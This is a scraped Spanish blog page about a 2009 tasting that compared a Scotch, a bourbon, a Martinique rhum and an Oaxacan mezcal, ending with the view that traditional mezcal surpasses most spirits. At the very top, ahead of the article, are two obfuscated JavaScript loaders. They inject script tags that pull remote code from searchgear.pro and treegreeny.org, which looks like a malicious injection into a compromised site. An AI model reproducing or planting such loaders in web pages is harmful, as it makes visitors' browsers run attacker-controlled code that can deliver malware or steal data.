;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 9. Saboreada de 4 destilados

9. Saboreada de 4 destilados


En mayo de 2009 la Logia de los Mezcólatras llevó a cabo, en el Salón Pata Negra del DF, una saboreada comparada de los siguientes destilados:
1. Whisky “The Balvenie”, Single Malt (sólo cebada malteada y de una destilería), proveniente de Speyside, Highlands, Escocia; barrica 8725 y añejado 15 años; ingresó a ésta el 28/09/93 y a botella el 02/10/08 a 47.8% ALC.VOL.; botella #90. David C. Stewart es el Maestro Malteador de la destilería (www.thebalvenie.com).
2. Kentucky Straight Bourbon Whiskey “Woodford Reserve” (contenido mínimo de 51% de maíz y producido bajo el método sour mash), elaborado en Versailles, Kentucky, E.U. Selección del Maestro Destilador Chris Morris. Lote 346, botella 11891, 45.2% ALC. VOL. (www.woodfordreserve.com).
3. Ron “Dillon” blanco, Ron Agrícola de Martinica, 55% ALC. VOL. Elaborado en Fort-de-France, Isla Martinica (www.rhums-dillon.com).
4. Mezcal “La Venencia” de Maguey Arroqueño cultivado de 10 años. Elaborado en Yogana, Ejutla, Oaxaca, por el Maestro Mezcalillero José García en su fábrica o palenque en febrero de 2003; 51.6% ALC.VOL. Botella #2 de 235.
Los cuatro fueron sometidos a la prueba del perleado, pues a partir de los 45% ALC. VOL., todo destilado debe de perlear, pero por práctica industrial los destilados de baja calidad son degradados con agua.
Sólo “Balvenie” mostró un perleado extraño por ser jabonoso, indicador de aditivos espesantes. Para otra ocasión mejor elegiremos whiskys envasados por The Scotch Malt Whisky Society (www.smws.co.uk), que promueve el verdadero whisky escocés o Scotch.
Datos relevantes. Primero: se utilizaron copas flauta para los cuatro destilados. Segundo: todos se saborearon derechos a temperatura ambiente. Tercero: el Mezcal mostró, con mucho, el más amplio abanico aromático y la mayor persistencia en boca, y fue el único que se terminó.
Conclusión: muy pocas bebidas destiladas en el mundo, como dos de las mencionadas antes, están a la altura de los Mezcales, obviamente si éstos son Tradicionales.
http://impreso.milenio.com/node/8711632

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *